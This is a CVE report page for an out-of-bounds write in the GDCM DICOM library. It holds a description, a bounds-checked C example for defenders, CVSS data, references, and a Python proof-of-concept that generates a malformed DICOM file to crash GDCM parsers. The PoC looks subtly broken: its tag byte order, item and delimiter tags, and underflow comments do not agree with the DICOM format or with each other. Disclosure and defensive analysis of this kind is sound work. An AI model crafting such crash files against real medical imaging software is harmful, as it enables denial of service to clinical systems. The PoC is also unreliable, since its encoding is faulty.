Security Vulnerability Report
CVE-2025-11266 CVSS 6.6 MEDIUM

CVE-2025-11266

Published: 2025-12-12 21:15:52
Last Modified: 2026-04-15 00:35:42

Description

An out-of-bounds write vulnerability exists in the Grassroots DICOM library (GDCM). The issue is triggered during parsing of a malformed DICOM file containing encapsulated PixelData fragments (compressed image data stored as multiple fragments). This vulnerability leads to a segmentation fault caused by an out-of-bounds memory access due to unsigned integer underflow in buffer indexing. It is exploitable via file input: simply opening a crafted malicious DICOM file is sufficient to trigger the crash, resulting in a denial-of-service condition.
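The defect class the description names, an unsigned underflow while indexing into encapsulated PixelData fragments, shown from the defender's side as an added C example that is not GDCM's code: a fragment-list walker whose length checks are ordered so that no subtraction can wrap. The (FFFE,E000)/(FFFE,E0DD) item tags and the 8-byte item header come from the DICOM encapsulation format; count_fragments, the sample buffers and the payload accounting are assumptions made here.

```c
#include <stdint.h>
#include <stddef.h>

/* Encapsulated PixelData item tags (DICOM PS3.5 A.4) as read little-endian. */
#define ITEM_TAG      0xE000FFFEu  /* (FFFE,E000): fragment item start */
#define SEQ_DELIM_TAG 0xE0DDFFFEu  /* (FFFE,E0DD): sequence delimitation */
#define ITEM_HDR_LEN  8u           /* 4-byte tag + 4-byte length */
static uint32_t rd32le(const uint8_t *p) {
    return (uint32_t)p[0] | ((uint32_t)p[1] << 8) |
           ((uint32_t)p[2] << 16) | ((uint32_t)p[3] << 24);
}

/* Walk the fragment items after a Pixel Data element of undefined length
 * (assumed helper, not GDCM's API). Returns the fragment count (the Basic
 * Offset Table item counts as one) or -1 on malformed input. Invariant:
 * off <= len after every step, so no unsigned subtraction below can wrap. */
int count_fragments(const uint8_t *buf, size_t len, size_t *payload) {
    size_t off = 0;
    int n = 0;
    *payload = 0;
    for (;;) {
        if (len - off < ITEM_HDR_LEN) return -1;   /* whole header present? */
        uint32_t tag = rd32le(buf + off);
        uint32_t item_len = rd32le(buf + off + 4);
        off += ITEM_HDR_LEN;
        if (tag == SEQ_DELIM_TAG) return item_len == 0 ? n : -1;
        if (tag != ITEM_TAG || item_len == 0xFFFFFFFFu) return -1;
        /* The check this bug class lacks: compare the declared length with
         * the bytes remaining instead of subtracting first; an unchecked
         * "remaining - item_len" wraps and the next index leaves the buffer. */
        if (item_len > len - off) return -1;
        off += item_len;
        *payload += item_len;
        n++;
    }
}
/* Constructed sample: empty Basic Offset Table, one 4-byte fragment, delimiter. */
static const uint8_t SAMPLE_OK[] = {
    0xFE, 0xFF, 0x00, 0xE0, 0, 0, 0, 0,
    0xFE, 0xFF, 0x00, 0xE0, 4, 0, 0, 0, 'A', 'A', 'A', 'A',
    0xFE, 0xFF, 0xDD, 0xE0, 0, 0, 0, 0 };
/* Constructed sample: fragment declares 16 bytes but only 4 follow. */
static const uint8_t SAMPLE_BAD[] = {
    0xFE, 0xFF, 0x00, 0xE0, 16, 0, 0, 0, 'A', 'A', 'A', 'A' };
int main(void) {   /* exit status 0 when both samples behave as expected */
    size_t b;
    return (count_fragments(SAMPLE_OK, sizeof SAMPLE_OK, &b) == 2 &&
            count_fragments(SAMPLE_BAD, sizeof SAMPLE_BAD, &b) == -1) ? 0 : 1;
}
```

Passing SAMPLE_OK with one byte fewer than its size leaves the delimiter header incomplete, and the walker rejects that too instead of reading past the end.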

CVSS Details

CVSS Score
6.6
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:H

Configurations (Affected Products)


GDCM < 3.2.2

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
import struct


def create_malicious_dicom():
    """
    Generate PoC DICOM file for CVE-2025-11266

    This PoC creates a malformed DICOM file with crafted PixelData
    to trigger out-of-bounds write in GDCM library.
    """
    # DICOM File Meta Information (preamble + prefix)
    preamble = b'\x00' * 128
    prefix = b'DICM'

    # Group 0002 Elements (File Meta Information)
    meta_group = b'\x00\x02'

    # Transfer Syntax UID (1.2.840.10008.1.2 = Implicit VR Little Endian)
    transfer_syntax = meta_group + struct.pack('<H', 0x0010) + b'\x00\x10' + b'\x01\x02\x00\x00'
    transfer_syntax += b'1.2.840.10008.1.2\x00\x00\x00'

    # Media Storage SOP Class UID (1.2.840.10008.5.1.4.1.1.2 = CT Image Storage)
    sop_class = meta_group + struct.pack('<H', 0x0002) + b'\x00\x06' + b'\x01\x02\x00\x00'
    sop_class += b'1.2.840.10008.5.1.4.1.1.2\x00\x00'

    # SOP Instance UID
    sop_instance = meta_group + struct.pack('<H', 0x0013) + b'\x00\x18' + b'\x01\x02\x00\x00'
    sop_instance += b'1.2.3.4.5.6.7.8.9.0.1.2.3.4.5.6\x00\x00\x00'

    # Patient Name (0008,0010) - VR=PN
    patient_name_tag = b'\x00\x08\x00\x10'
    patient_name = b'ANONYMOUS\x00\x00'
    patient_name_elem = patient_name_tag + b'\x00\x08' + b'\x01\x02\x00\x00' + patient_name

    # Modality (0008,0060) - VR=CS
    modality_tag = b'\x00\x08\x00\x60'
    modality = b'CT\x00\x00'
    modality_elem = modality_tag + b'\x00\x04' + b'\x01\x02\x00\x00' + modality

    # Rows (0028,0010) - VR=US
    rows_tag = b'\x00\x28\x00\x10'
    rows_elem = rows_tag + b'\x00\x02' + b'\x01\x02\x00\x00' + struct.pack('<H', 512)

    # Columns (0028,0011) - VR=US
    cols_tag = b'\x00\x28\x00\x11'
    cols_elem = cols_tag + b'\x00\x02' + b'\x01\x02\x00\x00' + struct.pack('<H', 512)

    # Bits Allocated (0028,0100) - VR=US
    bits_tag = b'\x00\x28\x01\x00'
    bits_elem = bits_tag + b'\x00\x02' + b'\x01\x02\x00\x00' + struct.pack('<H', 16)

    # Pixel Data (7FE0,0010) - Encapsulated - THE VULNERABLE TAG
    # Craft malformed encapsulated PixelData to trigger integer underflow
    pixel_data_tag = b'\x7f\xe0\x00\x10'
    # Use OB (Other Byte) VR with undefined length (0xFFFFFFFF)
    # This marks encapsulated data
    pixel_data_header = pixel_data_tag + b'\x00\x08' + b'\x01\x02\x00\x00' + struct.pack('<I', 0xFFFFFFFF)

    # Craft fragment with malicious length to cause underflow
    # Sequence Delimitation Item (no length)
    seq_delim = struct.pack('<I', 0x00000000)
    item_end = struct.pack('<I', 0x00000000)

    # Craft malicious fragment with length that causes underflow
    # When GDCM calculates: fragment_length - 8 (for header), can underflow
    # Set length to small value like 4, then subtract 8 = -4 = 0xFFFFFFFC (underflow)
    item_start = struct.pack('<I', 0xE0000000)        # Item with length
    malicious_length = struct.pack('<I', 0x00000004)  # Length = 4 bytes
    malicious_data = b'\x41' * 4                      # 4 bytes of data

    # End of Pixel Data Sequence
    seq_end = struct.pack('<I', 0xE0DD7FE0) + struct.pack('<I', 0x00000000)

    # Combine all parts
    pixel_data_fragment = item_start + malicious_length + malicious_data + item_end
    pixel_data_elem = pixel_data_header + pixel_data_fragment + seq_delim + seq_end

    # Combine all elements
    dicom_file = preamble + prefix + transfer_syntax + sop_class + sop_instance
    dicom_file += patient_name_elem + modality_elem + rows_elem + cols_elem + bits_elem
    dicom_file += pixel_data_elem
    return dicom_file


if __name__ == '__main__':
    poc_data = create_malicious_dicom()
    output_file = 'CVE-2025-11266_poc.dcm'
    with open(output_file, 'wb') as f:
        f.write(poc_data)
    print(f'[+] PoC DICOM file created: {output_file}')
    print(f'[+] File size: {len(poc_data)} bytes')
    print('[+] This file triggers OOB write in GDCM when parsed')
```

References

CISA CSAF advisory ICSMA-25-345-01: https://github.com/cisagov/CSAF/blob/develop/csaf_files/OT/white/2025/icsma-25-345-01.json
GDCM v3.2.2 release: https://github.com/malaterre/GDCM/releases/tag/v3.2.2
CISA ICS Medical Advisory ICSMA-25-345-01: https://www.cisa.gov/news-events/ics-medical-advisories/icsma-25-345-01
GDCM commit 5829c95c8ac3afa9a3a3413675e948959c28a789: https://github.com/malaterre/GDCM/commit/5829c95c8ac3afa9a3a3413675e948959c28a789

Weakness

CWE-787 (Out-of-bounds Write)

CVSS 4.0 (secondary metric)

Score 6.8 MEDIUM
Vector CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:A/VC:L/VI:L/VA:H/SC:N/SI:N/SA:N (remaining metrics not defined)

Record Status

Deferred